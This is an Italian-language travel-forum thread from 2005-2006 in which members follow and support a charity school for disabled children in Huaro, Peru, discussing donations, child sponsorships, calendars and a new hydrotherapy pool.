Spero di trovare presto il tempo di scrivere qualche cosa di più, anche se ora sono presissimo con la correzione delle bozze dei libri. Ma perchè non vi organizzate e venite a trovarmi?
Ora scappo perchè devo andare in aeroporto a Venezia.
Ciaoooooooo

trottola
04-08-2005, 12:04:55
Hola Gabriel, que tal estas?
Y "mi hijo"? :022:

leander
04-08-2005, 12:05:45
Già nostalgia, eh, Gabriele?
Dài, che appena si rinfresca un po' organizziamo qualcosa...
Un virile abbraccio! :021:

gabrielepoli
04-08-2005, 12:06:23
Todo bién, Trottolita y también tu hijito :)
Nos vemos pronto!

gabrielepoli
04-08-2005, 12:07:33
Ora scappo davvero, ma perchè aspettare il fresco se si può già fare ora? :002:

trottola
04-08-2005, 13:09:06
Todo bién, Trottolita y también tu hijito :)
Nos vemos pronto!

Ojalà, un beso :) :)

mark
04-08-2005, 13:15:22
Ora scappo davvero, ma perchè aspettare il fresco se si può già fare ora? :002:

Siamo 3160....hai la casa grande?
:027: :027: :027:

sangiopanza
04-08-2005, 15:44:12
Bene è venuta, ma secondo me troppo breve, tanto che praticamente quando ho finito di rendermi conto che eri proprio tu, era già finita.

gabrielepoli
04-08-2005, 17:28:22
Siamo 3160....hai la casa grande?
:027: :027: :027:[/quote]

ENORME :002: :002: :002:

gabrielepoli
04-08-2005, 17:29:24
Bene è venuta, ma secondo me troppo breve, tanto che praticamente quando ho finito di rendermi conto che eri proprio tu, era già finita.

Grazie.
In effetti credo che il "mega" intervento sia durato 15 secondi :)

gabrielepoli
13-08-2005, 11:02:44
Ciao ragazzi, date un'occhiata a questo indirizzo: http://www.larepublica.com.pe/noticia_p ... 2005-08-12 (http://www.larepublica.com.pe/noticia_pasada_cs.jsp?pId=14&pFechaInicio=2005-08-12)

Ora stiamo traducendolo e appena possibile ve lo farò avere anche in italiano.
Un abbraccione a tutti.
Gabriele

mark
13-08-2005, 11:31:38
Bravo Gabriele!
E se il Michael di cui si parla è il "nostro", bravo anche a lui per l'entusiasmo e perchè è un ottimo ballerino!
:022: :022: :022:

leander
13-08-2005, 11:52:34
Bravo Gabriele!
E se il Michael di cui si parla è il "nostro", bravo anche a lui per l'entusiasmo e perchè è un ottimo ballerino!
:022: :022: :022:

Sembra che sia proprio lui, speriamo che non si gasi troppo per la notorietà... :021:
Però, che bella cosa dare una mano e vedere che i nostri contributi vanno VERAMENTE dove vogliamo che vadano!
Un abbraccio a Gabriele e anche a Michael Jordan Palomino!! :025:

gabrielepoli
13-08-2005, 12:00:11
Sì, Maicol o Michael è proprio lui!
Ciao!

leander
13-08-2005, 12:01:59
Ma adesso sei a Vicenza o in Perù?

gabrielepoli
13-08-2005, 12:03:37
A Vicenza, carissimo, alle prese con gli alberghi per la guida...

Federico
14-08-2005, 10:06:36
A proposito, Gabriele, mi dispiace che sia passato tutto questo tempo, ma in questi giorni sono finalmente riuscito a sistemare le cose che avevamo in sospeso, quindi ci possiamo vedere, magari a Vicenza come eravamo d'accordo!

sangiopanza
14-08-2005, 10:24:55
Se vieni a Vicenza, Cigo, ci sono anch'io. e parliamo di sponsorizzazioni varie! :002:

gabrielepoli
14-08-2005, 10:33:32
Vi aspetto! Sarebbe ora che vi decideste a fare una mangiata qui: Sangio, naturalmente, mi aiuterà :002:
Ciao!

leander
14-08-2005, 12:47:58
Vi aspetto! Sarebbe ora che vi decideste a fare una mangiata qui: Sangio, naturalmente, mi aiuterà :002:
Ciao!


Io presente! Purché non sia il weekend 10-11 e il periodo 17-25 settembre. :027:

gabrielepoli
16-08-2005, 10:53:19
Ciao ragazzi, a questo indirizzo trovate l'articolo tradotto da Francesca, con alcune foto dell'inaugurazione di Huaro:


http://www.magiedelleande.it/servizi/ru ... to_000.php (http://www.magiedelleande.it/servizi/rubriche/rubriche_2002176-cod_2802001-sito_000.php)

poochie76
16-08-2005, 11:45:45
Un importantissimo traguardo: complimentoni!!! :)

Ed ecco Michael:

http://www.magiedelleande.it/servizi/rubriche/images/2079-3.jpg

:022: :022:

leander
16-08-2005, 15:05:28
Un importantissimo traguardo: complimentoni!!! :)
Ed ecco Michael:

:022: :022:

Qual'è, quello a sinistra con la pettinatura da bel tenebroso? :021:

gabrielepoli
16-08-2005, 15:08:09
Pagliaccio!

Date ora un'occhiata ad altre foto e all'articolo che ho appena scritto:

http://www.sudamerica.it/portali/peru/s ... to_001.php (http://www.sudamerica.it/portali/peru/servizi/rubriche/rubriche_2002179-cod_2002006-sito_001.php)

leander
16-08-2005, 15:18:36
Praticamente in tempo reale!
Lo stavo giusto leggendo adesso, sulla finestra di MdA aperta in contemporanea a quella di CSS.
Anche se so di essere ripetitivo, complimenti davvero!
Sarà perché di questi tempi tra sentire i progetti e vederli realizzati si fa in tempo a diventare vecchi e bacucchi (sulla strada già ci sono...), ma la gioia è davvero immensa! :022:

gabrielepoli
16-08-2005, 15:30:57
Grazie, caro Leander. Ti confesso che anche ora, scrivendolo, mi veniva la pelle ...d'oca al ricordo :)
Quando ci vediamo?
Ora me ne vado a lavorare all'Aia fino a questa sera dopo le 9: ci sentiamo domani.
Dov'é andato a finire Ricky? Non dirmi che è in vacanza, con tutto quello che deve fare a casa! :002:

leander
16-08-2005, 15:40:07
Ti mando un MP.

trottola
18-08-2005, 11:28:39
Ciao ragazzi, date un'occhiata a questo indirizzo: http://www.larepublica.com.pe/noticia_p ... 2005-08-12 (http://www.larepublica.com.pe/noticia_pasada_cs.jsp?pId=14&pFechaInicio=2005-08-12)

Ora stiamo traducendolo e appena possibile ve lo farò avere anche in italiano.
Un abbraccione a tutti.
Gabriele

Maicol, por su parte, sigue sin saber que su nombre se escribe ‘Michael’. Pero eso no importa ahora que tiene una escuela y que ya sabe que los milagros existen. :022: :022:

trottola
18-08-2005, 11:31:21
Un importantissimo traguardo: complimentoni!!! :)

Ed ecco Michael:

http://www.magiedelleande.it/servizi/rubriche/images/2079-3.jpg

:022: :022:

che invidia, Gabriele..........spero tu me l'abbia strapazzato come ti avevo chiesto. :002: :002:

gabrielepoli
18-08-2005, 11:38:13
Più che altro è lui che ha strapazzato me :002: :002: :002:
Hai letto anche l'altro articolo?

Baci

trottola
18-08-2005, 19:45:24
Più che altro è lui che ha strapazzato me :002: :002: :002:
Hai letto anche l'altro articolo?

Baci

certo ;)
un forte abbraccio e grazie. :)

Ninni77
29-08-2005, 22:00:47
Ragazzi, scusate la mia ignoranza, ma non seguo la vicenda dall'inizio e sono nel sito da poco, rispetto a tutti voi ;)
C'è qualche anima pia che può riassumermi il progetto, l'idea e tutto quanto??? :)

Grazie mille a chi si cimenterà :022:

poochie76
29-08-2005, 22:21:08
Basta cliccare qui: www.cisonostato.it/special/huaro/huaro_1.php (http://www.cisonostato.it/special/huaro/huaro_1.php)

leander
29-08-2005, 23:16:39
Leggi anche il topic "Abbiamo adottato Michael Jordan" in questo stesso canale.
Anche questo editoriale sulla prima Fiesta Latina: http://www.cisonostato.it/edit.php?id=27
E qui la seconda: http://www.cisonostato.it/page.php?id=1034
E naturalmente Magie delle Ande: http://www.magiedelleande.it/

Ricky
21-09-2005, 08:38:41
Ieri sera ci siamo incontrati a Vicenza con Gabriele, che ringrazio pubblicamente per la splendida ospitalità e la consueta, vulcanica simpatia.
E' stata l'occasione per consegnare quanto ricavato dalla Fiesta Latina 2004 (2500 euro che andranno devoluti interamente al progetto Huaro, ancora grazie a tutti voi) e per pianificare la prossima Fiesta.
Naturalmente si è parlato anche dell'evoluzione del progetto, che, lo ricordiamo, prevede che i ragazzi disabili possano, una volta frequentata la scuola, essere inseriti nel mondo del lavoro (si pensa ad una struttura di ricezione turistica, un ristorante e laboratori annessi alla scuola) e successivamente avere un "posto sicuro", una casa d'accoglienza, una volta raggiunta una certa età.
Colgo l'occasione per ricordare che prossimamente, in ottobre, ci sarà per chi volesse iscriversi all'associazione, l'assemblea di Magie delle Ande con successiva cena sociale.
Maggiori info naturalmente le trovate su www.magiedelleande.it (http://www.magiedelleande.it)

gabrielepoli
21-09-2005, 08:46:27
E' stata davvero una grande serata (anche un pochino alcolica ;) ) ieri sera con Ricky e Cigo.
Una volta di più (quante volte ormai!) devo ringraziare con tutto il cuore gli amici di cisonostato per l'appoggio, il sostegno continuo, la grandezza d'animo.
2500 euro che saranno utilissimi per proseguire con le nostre (e intendo di tutti noi) iniziative a favore dei bimbi di Huaro.
Un abbraccio, con tanto affetto.

occhidigatto
21-09-2005, 10:10:18
Grazie di cuore a VOI :022:

gabrielepoli
21-09-2005, 10:47:19
Sei tanto cara, Gatita :)

etta
09-10-2005, 21:33:21
Voglio ringraziare Gabriele e lo staff di Magie delle Ande per l'ultimo aggiornamento relativo al bimbo che ho adottato. Le notizie sono veramente confortanti. Grazie di cuore per quello che fate.

Etta

gabrielepoli
10-10-2005, 08:29:11
Un universo di grazie a te, Etta!
Baci. Gabriele

mark
25-11-2005, 16:59:08
Gabrieleeeeee, ma quest'anno niente calendari?
:022: :022: :022:

gabrielepoli
28-11-2005, 09:37:15
Ciao carissima...purtroppo quest'anno non siamo riusciti a farli...dispiace anche a me. Speriamo di rimediare il prossimo anno e quelli a seguire.
Ciao!

leander
28-11-2005, 10:18:29
Ciao carissima...purtroppo quest'anno non siamo riusciti a farli...dispiace anche a me. Speriamo di rimediare il prossimo anno e quelli a seguire.
Ciao!

Eccolo lì, il vecchio bucaniere della Cordillera! :?D?:
Peccato davvero per i calendari. Due persone che li hanno avuti l'anno scorso me l'hanno già richiesto, pensa tu!
Beh, troveremo altri modi per essere vicini a Huaro... :022:
Un abbraccio!

poochie76
30-11-2005, 15:59:16
Ciao Gabriele :107:

mark
14-12-2005, 16:02:46
Beh, troveremo altri modi per essere vicini a Huaro... :022:


Dovremo per forza!
:016:

etta
26-12-2005, 22:52:47
x Gabriele

voglio confermare anche per il prossimo anno tutto il mio sostegno ad Elmer e perciò chiedo: stesse condizioni dello scorso anno?

Aspetto istruzioni

Etta :107:

gabrielepoli
02-01-2006, 15:17:32
Sì, carissima, le condizioni sono le stesse. Dovrebbe comunque esserti arrivata la news sull'adozione.
Baci e tantissimi auguri, a te, a tuo marito e a tutti gli amici.
Gabriele

leander
02-01-2006, 16:01:01
Eccolo lì, "El Condor Pasa" dei Colli Berici! :?D?:
Buon Anno, Gabriele! Per noi il 2006 sarà l'anno del Perù (beh, non solo di quello, ma soprattutto...)! :027:

gabrielepoli
02-01-2006, 16:14:41
Buon anno, Leandro e a tutti voi!!!
Preparatevi...non manca poi molto :)

etta
02-01-2006, 22:02:45
Si ho ricevuto le news, provvederò.

Ricambio gli auguri di Buon Anno

Etta

Ricky
12-09-2006, 06:49:32
La scuola di Huaro ha appena compiuto un anno.
Oggi in home page http://www.cisonostato.it/page.php?id=1326 il resoconto di questo importante compleanno, nel segno di un progetto che continua, si sviluppa e ci vede orgogliosamente partecipi!

silviaf26
12-09-2006, 11:50:51
complimenti!!!
ho letto tutto con attenzione e ammirazione, una domanda: in cosa consiste esattamente l'idroterapia?

leander
12-09-2006, 11:56:05
in cosa consiste esattamente l'idroterapia?

Gabrieleeeeee! Rispondere, please... :027:

gabrielepoli
12-09-2006, 12:53:36
Ehi, che vocione, Leandro! :002:
L'idroterapia non è altro che un tipo di cura che si fa in acqua. Abbiamo costruito una piccola piscina riscaldata (capienza per 5-6 bimbi contemporaneamente, anche di più) con idromassaggio e altre alchimie strane. Serve in modo particolare per quei ragazzini con difficoltà motorie.
Si tratta di una novità assoluta per Huaro, ma pure per tutta la provincia. Rufina Romero, la direttrice del nostro centro scolastico, ha voluto l'idroterapia perché, a suo parere, si potranno risolvere non pochi problemi con tale tecnica.

Mi fa piacere ricordare che tutto questo che abbiamo fatto e tutto ciò che faremo da ora in avanti è merito anche di tutti voi e, in particolare, del fantastico staff di cisonostato.it
Grazieeee!!!

gabrielepoli
12-09-2006, 12:55:16
Importante:
abbiamo appena stampato i nuovi calendari 2007 e molto presto proporremo la loro vendita on line.
Ci aiutate a venderli? :022:
Rigrazie.

leander
12-09-2006, 14:01:13
Importante:
abbiamo appena stampato i nuovi calendari 2007 e molto presto proporremo la loro vendita on line.
Ci aiutate a venderli? :022:
Rigrazie.

Puoi dubitarne?
Magari aggiornaci qui quando sarà aperta la vendita. Sono un regalo tra i più graditi, l'anno scorso ci sono proprio mancati.

gabrielepoli
12-09-2006, 14:06:54
Sarà fatto, non dubitare, zio :)

silviaf26
12-09-2006, 14:37:32
Grazie per la spiegazione e in bocca al lupo per tutti i vostri progetti, aspetto i calendari 2007 per inziare con il mio piccolo contributo anch'io!